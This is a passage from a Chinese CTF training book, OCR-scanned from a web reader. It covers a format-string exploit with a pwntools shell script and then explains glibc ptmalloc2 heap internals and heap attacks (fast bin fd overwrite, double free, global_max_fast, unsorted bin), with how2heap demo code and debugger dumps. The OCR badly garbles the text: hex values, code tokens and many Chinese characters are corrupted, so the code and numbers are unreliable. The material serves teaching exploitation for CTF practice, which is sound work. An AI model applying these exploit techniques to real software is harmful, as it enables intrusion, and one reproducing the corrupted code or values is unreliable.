如 在 例 6-5-3 中 ， 猜 测 两 个 数 的 和 ， 猜 对 后 可 以 拿 到 shell。 不 考虑 尾 丰 的 情况 ， 昌 然 格式 化 字符 串 可 
以 泄露 这 两 个 数 的 值 ， 但 是 输入 是 在 泄露 前 ， 泄 露 后 已 经 无 法 修改 猜测 的 值 ， 所 以 必须 利用 这 个 机 
会 ， 直 接 往 num 中 填 上 a 与 b 的 和 和， 这 玖 需要 用 到 占 位 符 "*"。 


在 printf (buf) 处 设置 断 点 ， 此 时 栈 上 的 数据 见 图 6-5-3。a、 b 两 个 数 (分 别 为 0x1b2d、0xc8e3) 
在 第 8、9 个 参数 位 置 ，num_ptr 在 第 11 个 参数 位 置 。a、b 两 个 数 作为 两 个 输出 宽度 ， 输 出 的 字符 数 
就 是 a、b 之 和 ， 再 用 “%n” 写 入 num 中 ， 即 可 达到 num==a+b 的 效果 。 





脚本 如 下 : 


from pwn import * 

pay = "%x*8$c%*9$c%11$n" 
p= process('./fsb3') 
p.recvuntil('name') 
p.sendline(pay) 
p.recvuntil('gift') 
p.sendline('1') 
p.interactive() 


6.5.5 格式 化 字符 串 小 结 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek67c32d7022f67c6a1e7ce82 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 
格式 化 字符 串 利 用 最 终 还 是 任意 地 址 的 读 写 ， 一 个 程序 只 要 能 做 到 任意 地 址 读 写 ， 距 离 完 全 控制 束 不 


远 了 。 


有 了 时候 程序 会 开局 Fortify 保 护 机 制 ， 这 样 程序 在 编译 时 所 有 的 printf0 都 会 被 _printf_chk0 奉 换 。 两 
者 之 间 的 区 别 如 下 : 


学 当 使 用 位 置 参 数 时 ， 必 须 使 用 学 围 内 的 所 有 参数 ， 不 能 使 用 位 置 参数 不 连续 地 打印 。 例 
如 ， 要 使 用 “%3$x”， 必 须 同时 使 用 “%1$x” 和“%2$x”。 


学 包含 “%n” 的 格式 化 字符 串 不 能 位 于 内 存 中 的 可 写 地 址 。 


这 时 虽然 任意 地 址 写 很 难 ， 但 可 以 利用 任意 地 址 读 进行 信息 泄露 ， 配 合 其 他 漏洞 使 用 。 
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6.6 堆 利 用 


6.6.1 什么 是 堆 


堆 (chunk) 内 存 是 一 种 允许 程序 在 运行 过 程 中 动态 分 配 和 使 用 的 内 存 区 域 。 相 比 于 栈 内 存 和 全 局 内 
仔 ， 堆 内 存 没有 固定 的 生命 周期 和 固定 的 内 存 区 域 ， 程 序 可 以 动态 地 申请 和 释放 不 同 大 小 的 内 存 。 被 
分 配 后 ， 如 果 没 有 进行 明确 的 释放 操作 ， 该 堆 内 存 区 域 都 是 一 直 有 效 的 。 


为 了 进行 高 效 的 堆 内 存 分 配 、 回 收 和 管理 ，Glibc 实 现 了 Ptmalloc2 的 堆 管 理 器 。 本 证 主要 介绍 ， 1 

ma 

2 堆 管 理 器 缺陷 的 分 析 和 利用 。 这 里 只 介绍 Glibc 2.25 版 本 最 基本 的 结构 和 概念 ， 以 及 2.26 版 本 的 加 
入 新 特性 ， 具 体 堆 管理 器 的 实现 请 i 卖 者 根据 Ptmalloc2 源 代码 进行 深入 了 解 。 


Ptmalloc2 堆 管理 器 分 配 的 最 基本 的 内 存 结构 为 chunk。chunk 基 本 的 数据 结构 如 下 : 


struct malloc_chunk { 
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */ 
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */ 
struct malloc_chunk* fd; /* double Links -- used only if free. */ 


*/ 
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ 
struct malloc_chunk* bk_nextsize; 
于 


其 中 ，mchunk size 记 录 了 当前 chunk 的 大 小 ，chunk 的 大 小 都 是 8 字 节 对 齐 ， 所 以 mchunk size 的 

低 3 位 固定 为 0 (810=1000?) 。 为 了 充分 利用 内 存 空间 ，mchunk_size 的 低 3 位 分 别 存 储 PREV_ 
INUS 

、IS MMAPPED、NON MAIN ARENA 信 息 。NON MAIN ARENA 用 来 记录 当前 chunk 是 否 不 属 


于 主线 程 ，1 表 示 不 属于 ，0 表 示 属 于 。IlS MAPPED 用 来 记录 当前 chunk 是 否 是 由 mmap 分 配 的 。 站 


_INUSE 用 来 记录 前 一 个 chunk 块 是 否 被 分 配 ， 如 果 与 当前 chunk 向 上 相 邻 的 chunk 为 被 释放 的 状 
态 ， 则 PREV_INUSE 标 志 位 为 0， 并 且 mchunk_prev_size 的 大 小 为 该 被 释放 的 相 邻 chunk 的 大 小 。 堆 
管理 器 可 以 通过 这 些 信息 找到 前 一 个 被 释放 chunk 的 位 置 。 


chunk 在 管理 器 中 有 3 种 形式 ， 分 别 为 allocated chunk、free chunk 和 top chunk。 当 用 户 申请 一 
块 内 存 后 ， 堆 管理 器 会 返回 一 个 allocated chunk， 其 结构 为 mchunk prev size+mchunk size+ 
memory。user memory 为 可 被 用 户 使 用 的 内 存 空 间 。free chunk 为 allocated chunk 被 释放 后 
的 存在 形式 。top chunk 是 一 个 非常 大 的 free chunk， 如 果 用 户 申 请 内 存 大 小 比 top chunk 小 ， 则 由 ， 
chunk 分 割 产生 。 在 64 位 系统 中 ，chunk 结 构 最 小 为 32 (0x20) 字 节 。 如 未 特殊 说 明 ， 本 章 叙 述 
的 对 象 默认 为 64 位 Linux 操 作 系 统 。 


为 了 高 效 地 分 配 内 存 并 尽量 避免 内 存 碎片 ，Ptmalloc2 将 不 同 大 小 的 free chunk 分 为 不 同 bin 结 构 ， 分 
别 为 Fast Bin、Small Bin、Unsorted Bin、Large Bin。 


1. Fast Bin 


Fast Bin 分 类 的 chunk 的 大 小 为 32 ~ 128 (0x80) 字 节 ， 如 果 chunk 在 被 释放 时 友 现 其 大 小 满足 这 个 

要 求 ， 则 将 该 chunk 放 入 Fast Bin， 且 在 被 释放 后 不 修改 下 一 个 chunk 的 PREV_INUSE 标 志 位 。Fast 
在 堆 管 理 器 中 以 单 链 表 的 形式 存储 ， 不 同 大 小 的 Fast Bin 存 储 在 对 应 大 小 的 单 链表 结构 中 ， 其 单 链 

表 的 存 取 机 制 是 LIFO (后 进 先 出 ) 。 一 个 最 新 被 加 入 Fast Bin 的 chunk， 其 fd 指 儿 指向 上 一 次 加 入 
Bin 的 chunk。 


das 


2. Small Bin 


Small Bin 保 存 大 小 为 32 ~ 1024 (0x400) 字 节 的 chunk， 每 个 放 入 其 中 的 chunk 为 双 链 表 结 构 ， 不 
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同 大 小 的 chunk 存 储 在 对 应 的 链接 中 。 由 于 是 双 链 表 结 构 ， 所 以 其 速度 比 Fast Bin 慢 一 些 。 链 表 的 人 存 


取 方 式 为 FIFO (先进 先 出 ) 。 


3. Large Bin 


大 于 1024 (0x400) 字 节 的 的 chunk 使 用 Large Bin 进 行 管理 。Large Bin 的 结构 相对 于 其 他 Bin 是 最 
复杂 的 ， 速 度 也 是 最 慢 的 ， 相 同 大 小 的 Large Bin 使 用 fd 和 bk 指 针 连 接 ， 不 同 大 小 的 Large Bin 通 过 fd 
_nextsize 和 bk nextsize 按 大 小 排序 连接 。 


4. Unsorted Bin 


Unsorted Bin 相 当 于 Ptmalloc2 堆 管理 器 的 垃圾 桶 。chunk 被 释放 后 ， 会 先 加 入 Unsorted Bin 中 ， 等 
待 下 次 分 配 使 用 。 在 堆 管 理 器 的 Unsroted Bin 不 为 空 时 ， 用 户 申请 非 Fast Bin 大 小 的 内 存 会 先 从 

nso 

Bin 中 查找 ， 如 果 找 到 符合 该 申请 大 小 要 求 的 chunk (等 于 或 者 大 于 ) ， 则 直接 分 配 或 者 分 割 该 

C 


6.6.2 简单 的 堆 阁 出 


堆 溢出 是 最 简单 也 是 最 直接 的 软件 漏洞 。 在 实际 软件 中 ， 堆 通 冲 会 存储 各 种 结构 体 ， 通 过 堆 溢 出 履 盖 
结构 体 进 而 复 改 结构 体 信 息 ， 往 往 可 以 造成 远程 代码 执行 等 严重 漏洞 。 什 么 是 堆 溢 出 呢 ? 溢出 后 如 何 
对 漏洞 进行 利用 呢 ? 我 们 通过 一 个 简单 的 例子 直观 地 感受 。 


【 例 6-6-1】 


#include <stdlib.h> 
#include <stdio.h> 
#include <unistd.h> 
struct AAA { 
char buf[Qx20]; 
void (x*func)(char *); 
3 
void out(char x*buf) { 
puts(buf); 
} 
void vuln() { 
struct AAA *a = malloc(sizeof(struct A)); 
a->func = out; 
read(0, a->buf, Qx30); 
a->func(a->buf); 
} 
void main() { 
vuln(); 
} 


在 例 6-6-1 中 可 以 友 现 明显 的 堆 溢 出 ， 结 构 体 AAA 中 bu 人 的 大 小 为 32 字 节 ， 却 读 入 了 48 字 节 的 字符 ， 
过 长 的 字符 直接 覆盖 了 结构 体 中 的 消 数 指针 ， 进 而 调用 该 函数 指针 时 实现 了 对 程序 控制 流 的 动 持 。 


6.6.3 堆 内 仔 破坏 漏洞 利用 


天 于 对 Ptmalloc2 堆 管理 器 的 缺陷 进行 漏洞 利用 ， 本 节 进 行 源 代 码 级 别 的 调试 和 缺陷 分 析 ， 分 析 。 

2 堆 管 理 器 的 缺陷 ， 以 及 如 何 利用 这 些 缺 陷 进 行 漏洞 利用 。 由 于 篇 幅 有 限 ， 本 节 只 进行 基础 的 缺 
利用 分 析 。 本 节 使 用 的 工具 是 pwndbg (https://github.com/pwndbg/pwndbg) 和 shellphish 
团队 分 享 的 how2heap (https://github.com/shellphish/how2heap) ， 读者 可 以 关注 how2 

项 目 中 对 应 缺陷 的 CTF 题 目 。 


ea 


6.6.3.1 Glibc 调 试 环 境 搭建 
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下 面 以 Ubuntu 16.04 系 统 为 例 ， 搭 建 Glibc 源 码 调试 环境 。 首 先 需 要 安装 pwndbg， 具 体 的 安装 教程 
见 项 目 主页 。 然 后 下 载 GlibG 原 码 ， 可 以 直接 通过 如 下 命令 


安装 源码 包 。 完 成 后 ， 在 /usr/src/glibc 目 录 中 可 以 发 现 glibc-2.23.tar.xz 文 件 ( 见 图 6-6-1) ， 解 
压 该 文件 ， 可 以 看 到 glibc-2.23 的 源码 。 


在 GDB 中 ， 使 用 dir 命 令 设置 源码 搜索 路 径 : 


pwndbg> dir /usr/src/glibc/glibc-2.23/malloc 
Source directories searched: /usr/src/glibc/glibc-2.23/malloc:$cdir:$cwd 


PootaQubuntu16 
PootQubuntu16 
PoOootQupbuntu16 
je | QL1b 
POOLQUDUntU 
PoOootQupuntu16 


图 6-6-1 


这 样 可 以 在 源码 级 别 调试 Glibc 源 码 ( 见 图 6-6-2) 。 为 了 方便 ， 可 以 在 “~/.gdbinit” 中 加 入 : 


dir /usr/src/glibc/glibc-2.23/malloc 


图 6-6-2 
Da NE :Es 


针对 其 他 Linux 发 行 版 ， 也 可 以 通过 这 样 的 方式 搭建 源码 调试 环境 。 我 们 可 以 在 发 行 版 的 官网 上 找到 
源码 包 ， 如 Ubuntu 16.04 的 libc 源 码 可 以 在 https://packages.ubuntu.com/xenial/glibc-source 
上 找到 |。 


6.3.6.2 Fast Bin Attack 


6.6.1 节 介绍 了 Fast Bin 是 单 链表 结构 ， 使 用 FD 指针 连接 的 LIFO 结 构 。 在 Glibc 2.25 及 其 之 前 版 本 ， 
€ 
在 被 释放 后 ， 会 先 判 断 其 大 小 是 否 不 超过 global max fast 的 大 小 ， 如 果 是 ， 则 放 入 Fast Bin， 人 否 


[mm 


则 进行 其 他 操作 。 下 列 代 码 是 截取 Glibc 2.25 中 Ptmalloc2 源 代码 中 关于 对 Fast Bin 处 理 的 一 部 分 ， 在 
chunk 的 大 小 满足 不 超过 global_max_fast 的 条 件 后 ， 还 会 判断 其 大 小 是 否 超过 最 小 chunk 且 小 于 系统 
内 存 ， 然 后 将 该 chunk 加 入 相应 大 小 的 链表 。 


// 加 果 小 于 global max fast， 则 进入 Fast Bin 的 处 理 
if ((unsigned long)(size) <= (unsigned long)(get_max_fast () 
// If TRIM_FASTBINS set, don't place chunks, bordering top into fastbins 
#if TRIM_FASTBINS 
&& (chunk_at_offset(p, size) != av->top) 
#endif 


3 

if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_Sz, 8) 
11 -builtin_expect (chunksize (chunk_at_offset (p, size)) >= av->system_mem, 9)) { 

free_perturb (chunk2mem(p), size - 2 * SIZE_S2); 


set_fastchunks(av); 
unsiqned int idx = fastbin_index(size):; // 获取 该 大 小 的 Fast Bin 的 idx 
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fb = &fastbin(av, idx); 
// Atomically Link P to its fastbin: P->FD = *FB; *FB = Pp; 
mchunkptr old = *fb, old2; 
unsigned int old_idx = ~Qu; 
do { 
// Check that the top of the bin is not the record we are going to add(i.e., double free) 
// 检查 是 否 为 doubLe free， 但 是 上 次 free 的 是 b， 所 以 可 以 绕 过 这 个 检查 
if (__builtin_expect (old == p, 0)) { 
errstr = "double free or corruption (fasttop)"; 
goto errout ; 
} 
/* Check that size of fastbin chunk at the top is the same as 
Size of the chunk that we are adding. We can dereference OLD 
only if we have the lock, otherwise it might have already been 
deallocated. See use of OLD_IDX below for the actual check. */ 
if (have_lock && old != NULL) 
old_idx = fastbin_index(chunksize(old)); 
p->fd = oLd2 = old; 
} while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2); 


if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 06)) { 
errstr = "invalid fastbin entry (free)"; 
goto errout,; 


} 


Fast Bin 的 申请 操作 也 不 复杂 ， 先 判断 申请 的 大 小 是 否 不 超过 global max fast 的 大 小 ， 如 果 满 足 ， 
则 从 该 大 小 的 链表 中 取出 一 个 chunk。 但 是 在 取出 chunk 后 ， 代 和 码 


if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0)) 


对 取出 的 chunk 的 合法 性 进行 了 验证 ， 验 证 该 chunk 的 size 部 位 必须 与 该 链表 应 该 存储 的 chunk 的 size 
部 位 一 致 。 换 句 话说 ， 如 果 该 链表 存储 的 是 size 为 0x70 大 小 的 chunk， 那 么 从 该 链表 取出 的 chunk 的 
size 部 位 也 必须 是 0x70。 在 确定 chunk 的 size 部 位 合法 后 ， 会 返回 该 chunk。 (从 源码 看 ，Ptmalloc2 
存在 很 多 严格 的 检查 ， 但 是 很 多 检查 需要 开启 MALLOC _DEBUG 才 会 生效 。 这 个 参数 默认 是 关闭 的 ， 
具体 请 查阅 Ptmalloc2 源 码 。) 


// 如 果 小 于 global max fast， 则 进入 Fast Bin 的 处 理 
if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) { 
idx = fastbin_index (nb); 
mfastbinptr *fb = &fastbin (av, idx); // 获 取 fastbin 的 idx 
mchunkptr pp = *fb; 
do { 
victim = pp; 
if (victim == NULL) 
break ; 
} while ((pp = catomic_compare_and_exchange_val_acq(fb, victim->fd, victim)) != victim); 
if (victim != 0) { 
// 检 查访 链表 的 chunk 的 Size 是 否 合法 
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0)) { 
errstr = "malloc(): memory corruption (fast)"; 
errout : maLLoc_printerr (check_action, errstr, chunk2mem (victim), av); 
return NULL; 
} 
check_remalloced_chunk (av, victim, nb); 
void *p = chunk2mem (victim); 
alloc_perturb (p, bytes); 
return p; 


根据 上 面 的 源码 分 析 ， 我 们 可 以 得 出 Ptmalloc2 在 处 理 Fast Bin 大 小 的 chunk 时 ， 对 chunk 的 合法 性 的 
检查 并 不 多 。 所 以 ， 我 们 可 以 利用 以 下 缺陷 进行 漏洞 利用 。 


1. 修改 fd 指针 


针对 一 个 已 经 在 Fast Bin 的 chunk， 我 们 可 以 修改 其 fd 指针 措 向 目标 内 存 ， 这 样 在 下 次 分 配 该 大 小 的 
chun 
时 就 可 以 分 配 到 目标 内 存 。 但 是 在 分 配 Fast Bin 时 ，Ptmalloc2 存 在 一 个 对 chunk 的 size 位 的 检 
查 ， 我 们 可 以 通过 修改 目标 内 存 的 size 位 来 绕 过 这 个 检查 。 


#include <stdlib.h> 
#include <stdio.h> 
#include <unistd.h> 


typedef struct animal { 
char desc[9x8] ; 
size_t lifetime; 

} Animal; 


void main(){ 
Animal *A = malloc(sizeof(Animal)); 
Animal *B = malloc(sizeof(Animal)); 
Animal *C = malloc(sizeof(Animal)); 


char *target = malloc(Qx10); 
memcpy(target, "THIS IS SECRET", QOx10); 


malloc(Qx80); 


free(C); 
free(B); 


// overflow from A 
char *payload = "AAAAAAAAAAAAAAAAAAAAAAAA\x21\xQ0\xQO\xO0\xAO\xAO\xQO\xQO\x60"; 
memcpy(A->desc, payload, QOx21); 
Animal *D = malloc(sizeof(Animal)); 
Animal *E = malloc(sizeof(Animal)); 
write(1, E->desc,0x10); 
} 
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(1) 修改 fd 指针 低位 


ESSE = l= Eb S/S 
过 其 他 漏洞 获得 内 人 存 地 址 ， 这 意味 痢 需 要 额外 的 漏洞 来 进行 漏洞 利用 。 但 是 堆 的 分 配 人 在 系统 中 的 侦 移 
是 固定 的 ， 分 配 的 挫 内 存 的 地 址 相对 于 堆 内 存 的 基地 址 是 固定 的 ， 通 过 修改 fd 指针 的 低位 ， 我 们 不 需 
要 进行 信息 泄漏 也 可 以 进行 内 人 存 的 Overlap 实 现 攻击 。 


(1BIelllej -了 二 -上 


在 前 文 的 释放 Fast Bin 大 小 的 内 人 存 的 源 代码 中 可 以 看 到 ，Ptmalloc2 会 验证 当前 释放 的 chunk 是 否 和 上 
一 次 释放 的 chunk 一 致 ， 如 果 一 致 ， 则 说 明 出 现 了 Double Free。 这 样 的 验证 逻辑 很 直接 ， 但 是 也 很 
容易 绕 过 。 我 们 可 以 通过 先 释 放 A， 表 释放 B， 最 后 释放 A 来 绕 过 这 样 的 校 验 。 结 合 Fast Bin 单 链表 的 
特性 ，Double Free 后 ，Fast Bin 形 成 了 一 个 单 链表 的 环 状 结构 ， 进 而 实现 对 内 存 的 Overlap。 我 们 以 
how2heap 项 目的 代码 调试 讲解 这 一 过 程 。 


#include <stdio.h> 
#include <stdlib.h> 


int main() { 
fprintf(stderr, "This file demonstrates a simple doubLe-free attack with fastbins.\n"); 


fprintf(stderr, "Allocating 3 buffers.\n"); 
int *a = malloc(8); 
int *b = malloc(8); 
int *c = malloc(8); 


fprintf(stderr, "lst malloc(8): %p\n", a); 
fprintf(stderr, "2nd malloc(8): %p\n", b); 
fprintf(stderr, "3rd malloc(8): %p\n", c); 


fprintf(stderr, "Freeing the first one...\n"); 
free(a); 


fprintf(stderr, "If we free %p again,things will crash because %p is at the top of the free list.\n",a,a); 
// free(a) ; 


fprintf(stderr, "So, instead, we'll free %p.\n", b); 
free(b); 


fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n",a); 
free(a); 


fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p 
twice!\n",a,b,a,a); 

fprintf(stderr, "lst malloc(8): %p\n", malloc(8)); 

fprintf(stderr, "2nd malloc(8): %p\n", malloc(8)); 

fprintf(stderr, "3rd malloc(8): %p\n", malloc(8)); 


首先 ，3 次 malloc 后 ， 堆 上 的 内 存 分 布 如 下 : 


pwndbg> x/20gx 9x692000 

69x602000: 9x9900609006006066096 69x600066006069090021 
Qx602010: 90x000000990000600006 9x90009006000600069 
Qx602020: 9x99006900660696696 9x69006600609669021 
Ox602030: 9x990909090090096066 9x696909900900699069 
Qx602040: 9x99096999609009066 9x99099096996099921 
Qx602050: 9x900009906600609669 9x609096600600096900698 
Ox602060: 9x99096099699009066 9x696099096699929fal 
9x602076: 9x9000609090660699666 9x6909960690660069 
Qx602080: 9x990060990660060960696 9x6090906606096990069 
Qx602090: 9x99096990699009066 9x9909900609999069 


free b 后 ， 堆 上 的 内 存 分 布 如 下 : 


pwndbg> fastbins 

fastbins 

9x26: QOx602020 —» Ox6020060 <— 9x9 
Qx30: 9x9 

9x46: OxQO 

Qx50: 9x9 

Qx60: 9x9 

9x70: QOxO 

Qx80: 9x9 

pwndbg> 


再 次 free a。 这 时 在 free 函 数 上 设置 断 点 


pwndbg> b free 
Breakpoint 2 at QOx7ffff7a91d4f0: free. (2 locations)Ox50: 0xg 


在 完成 free 操 作 后 ， 可 以 看 到 该 chunk 已 经 加 入 fastbins 的 单 链表 了 。 


pwndbg> fastbins 

fastbins 

Qx20: QOx602020 —» Ox6020060 <*— 9x6929286 /* ' *' */ 
Qx30: 9x9 

Qx40O: 9x9 

AvySA* AvyN 
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2. Global Max Fast 


Global Max Fast 是 决定 使 用 Fast Bin 管 理 的 chunk 的 最 大 值 ， 也 就 是 说 ，Ptmalloc2 会 把 所 有 比 它 小 
的 chunk 都 当 作 Fast Bin 来 处 理 。 而 因为 Fast Bin 单 链表 的 特性 ， 同 时 针对 Fast Bin 的 检查 又 比较 单 

， 我 们 可 以 轻松 地 绕 过 检查 来 进行 漏洞 利用 。 通 常 ， 改 写 Global Max Fast 可 以 使 得 漏洞 利用 更 加 
EslEte 


细 看 Ptmalloc2 的 源 代码 ， 在 获取 相应 大 小 的 Fast Bin 链 表 时 ， 是 根据 当前 size 的 获得 的 idx 值 ， 然 后 
在 当前 arena 的 fastbinsY 数 据 中 查找 到 的 。 


#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx]) 


获取 fastbin 的 idx 是 根据 size 的 大 小 进行 运算 的 ， 如 果 size 变 大 ，idx 的 值 也 会 相应 变 大 。 


#define fastbin_index(sz) ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ?4 : 3)) - 2) 


malloc_state 结 构 体 的 定义 如 下 ，fastbinsY 数 组 的 大 小 是 固定 的 。 也 就 是 说 ， 如 果 改 写 了 Global a 

Fast， 让 堆 管 理 器 使 用 Fast Bin 管 理 比 原来 chunk 大 的 chunk， 那 么 fastbinsY 数 组 会 出 现 数组 溢 
出 。arena 的 位 置 是 在 glibc 的 bss 段 ， 也 就 是 说 ,我们 可 以 利用 改写 Global Max Fast 后 ， 处 理 特定 大 
小 的 chunk， 进 而 可 以 在 arena 往 后 的 任意 地 址 写 入 一 个 扒 地 址 。 


#define MAX_FAST_SIZE (80 * SIZE_SZ / 4) 
#define NFASTBINS (fastbin_index (request2size (MAX_FAST_SIZE)) + 1) 


struct malloc_state { 

/* Serialize access. */ 

__Libc_Lock_define (, mutex); 

/* Flags (formerly in max_fast). */ 

int flags; 

/* Fastbins */ 

mfastbinptr fastbinsY[NFASTBINS]; 

/* Base of the topmost chunk -- not otherwise kept in a bin */ 

mchunkptr top; 

/* The remainder from the most recent split of a small request */ 

mchunkptr last_remainder; 

/* Normal bins packed as described above */ 

mchunkptr bins[NBINS * 2 - 2]; 

/* Bitmap of bins */ 

unsigned int binmap[BINMAPSIZE]; 

/* Linked list */ 

struct malloc_state x*next; 

/* Linked list for free arenas. Access to this field is serialized 
by free_List_Lock in arena.c. */ 

struct malloc_state *next_free; 

/* Number of threads attached to this arena. 0 if the arena is on the free list. 
Access to this field is serialized by free_list_lock in arena.c. */ 

INTERNAL_SIZE_T attached_threads; 

/* Memory allocated from the system in this arena. */ 

INTERNAL_SIZE_T System_mem; 

INTERNAL_SIZE_T max_system_mem; 


志 管 只 能 写 入 堆 地 址 的 局 限 性 比较 大 ， 但 是 如 果 可 以 控制 Fast Bin 的 fd 指针 ， 我 们 融 可 以 实现 任意 内 


6.6.3.3 Unsorted Bin List 


chunk 在 被 释放 后 ， 如 果 其 大 小 不 在 Fast Bin 的 学 围 内 ， 会 先 被 放 到 Unsorted Bin。 在 申请 内 存 时 ， 
如 果 大 小 不 是 Fast Bin 大 小 的 内 存 并 且 在 Small Bin 中 没有 找到 合适 的 chunk， 就 会 从 Unsorted Bin 中 


查找 。Unsorted Bin 是 双向 链表 的 结构 ， 如 果 刚 好 找到 了 符合 要 求 的 chunk， 就 会 分 割 返回 。 但 是 


Seliarse 


Bin 碍 找 过 程 中 不 会 严格 检查 ， 我 们 可 以 在 Unsorted List 中 插入 一 个 伪造 的 chunk， 来 混淆 


ptmalloc 


2 党 理 器 ， 进 而 分 配 到 我 们 想 要 的 目标 内 人 存 。 pA 
ae 
_stack.c 文 件 来 讲解 具体 的 攻击 方法 。 


#include <stdio.h> 
#include <stdlib.h> 
#include <stdint.h> 


int main() { 
intptr_t stack_buffer[4] = {0}; 


fprintf(stderr, "Allocating the victim chunk\n"); 
intptr_t* victim = malloc(0x100); 


fprintf(stderr, "Allocating another chunk to avoid consolidating the top chunk with 
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tne smaLL one auring tne freeUJNn"Ji 
intptr_tx pl = maLLoc(9x109) ; 


fprintf(stderr, "Freeing the chunk %p, it WiLL be inserted in the unsorted bin\n", victim); 
free(victim); 


fprintf(stderr, "Create a fake chunk on the stack"); 

fprintf(stderr, "Set size for next allocation and the bk pointer to any writable address"); 
stack_buffer[1] = Ox100 + 9x19; 

stack_buffer[3] = (intptr_t)stack_buffer; 


fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->size and 
victim->bk pointer\n"); 
fprintf(stderr, "Size should be different from the next request size to return 
fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n"); 
victim[-1] = 32; 
victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack 


/一 一 一 


fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]); 
fprintf(stderr, "malloc(Ox100): %p\n", malloc(Ox100)); 


通过 调试 观察 ， 在 free (victim) 的 时 候 ， 堆 管理 器 中 已 经 出 现 了 Unsorted Bin 的 内 存 了 : 


pwndbg> unsortedbin 
unsortedbin 
all: QOx602000 —» 0x7ffff7dd1b78 (main_arena+88) <— 0x602000 


继续 单 步 调试 运行 到 30 行 时 ， 此 时 victime 的 内 存 排 布 如 下 : 


pwndbg> x/20gx 9x602099 
9x602096: 9x99096099609009666 9x9699999699999929 
Qx602010: 9x99067ffff7ddlb78 9x699097fffffffe3d9 


fd 指针 指向 main_arena 的 地 址 ，bk 指 向 目标 栈 地 址 。 目 标 栈 地 址 的 内 存 排 布 如 下 : 


pwndbg> x/20gx 9x99097fffffffe3d9 
9x7fffffffe3d0 : 9x0960009600606000666 9Qx96999999990999110 
9x7fffffffe3eg : 9x900099000096609606 9x99997fffffffe3d0 


其 大 小 为 0x110，fd 为 空 ，bk 为 本 身 chunk 地 址 。 我 们 在 int _ malloc 函数 上 设置 断 点 : 


略 过 无 关 代 码 ， 直 接 看 处 理 Unsorted Bin 部 分 的 代码 : 


SO CT 
int iters = 0; 
// 处 理 unsorted bin 的 循环 ， 首 先 获得 链表 中 的 第 一 个 chunk 
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) { 
bck = victim->bk; // bck 是 该 第 二 个 chunk 
// 剂 断 victim 是 否 合法 
if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ，0) 

11 __builtin_expect (chunksize_nomask (victim) > av->system_mem, 0)) 
malloc_printerr (check_action, "malloc(): memory corruption", chunk2mem (victim), av); 
size = chunksize (victim); 

/* If a small request, try to use last remainder if it is the only chunk in 
unsorted bin. This helps promote locality for runs of consecutive small 
requests. This is the only exception to best-fit, and applies only when 
there is no exact fit for a small chunk. */ 

if (in_smallbin_range (nb) && bck == unsorted_chunks (av) && victim == 
av->Last_remainder && (unsigned long) (size) > (unsigned long) (nb + MINSIZE)) { 

/* split and reattach remainder */ 
remainder_size = size - nb; 
remainder = chunk_at_offset (victim, nb); 
unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder; 
av->Last_remainder = remainder; 
remainder->bk = remainder->fd = unsorted_chunks (av); 
if (!in_smallbin_range (remainder_size)) { 
remainder->fd_nextsize = NULL; 
remainder->bk_nextsize = NULL; 
} 
set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 9)); 
set_head(remainder, remainder_size | PREV_INUSE); 
set_foot(remainder, remainder_size); 


check_malloced_chunk(av, victim, nb); 
void x*p = chunk2mem (victim); 
alloc_perturb (p, bytes); 
return p; 

} 


/* remove from unsorted list */ 
unsorted_chunks(av)->bk = bck; 


bck->fd = unsorted_chunks (av); 


/* Take now instead of binning if exact fit */ 
// 如 果 大 小 刚好 符合 ， 返 回 该 chunk 
if (size == nb) { 
set_inuse_bit_at_offset(victim, size); 
if (av != &main_arena) 
set_non_main_arena(victim); 
check_malloced_chunk(av, victim, nb); 
void *p = chunk2mem(victim); 
alloc_perturb (p, bytes); 
return p; 


} 


/* place chunk in bin */ 
// 对 Unsorted bin 中 的 chunk， 根 据 大 小 不 同 进行 处 理 ， 放 入 对 应 的 bin 中 
if (in_smallbin_range (size)) { 
Victim_index = smallbin_index (size); 
bck = bin_at (av, victim_index); 
fwd = beck->fd; 
} 
else { 
// 对 Large bin 进行 处 理 


} 


// 插入 双 链 表 

mark_bin (av, victim_index); 
victim->bk = bck; 

Victim->fd = fwd; 

fwd->bk = victim; 

bck->fd = victim; 


#define MAX_ITERS 10909 
if (++iters >= MAX_ITERS) 
break; 


其 中 可 以 看 到 : 
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while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) 
首先 获得 unsoted bin list 中 的 第 一 个 chunk。 这 里 获得 的 victim 就 是 我 们 一 开始 free 的 victim。 


pwndbg> print victim 
$1 = (mchunkptr) Ox602000 


根据 “bck=victim->bk”， 可 以 得 知 bck 就 是 目标 栈 地 址 ， 在 GDB 中 可 以 看 到 该 信息 。 


pwndbg> print bck 
$2 = (mchunkptr) 90x7fffffffe3d0 


继续 往 下 执行 : 


if (in_smallbin_range (nb) && bck == unsorted_chunks (av) && 
Victim == av->Last_remainder && (unsigned long) (size) > (unsigned long) (nb + MINSIZE)) 


由 于 victim 不 是 last_remainder 且 size 不 满足 ， 因 此 不 进入 这 个 分 支 。 


往 下 执行 ， 可 以 观察 到 : 


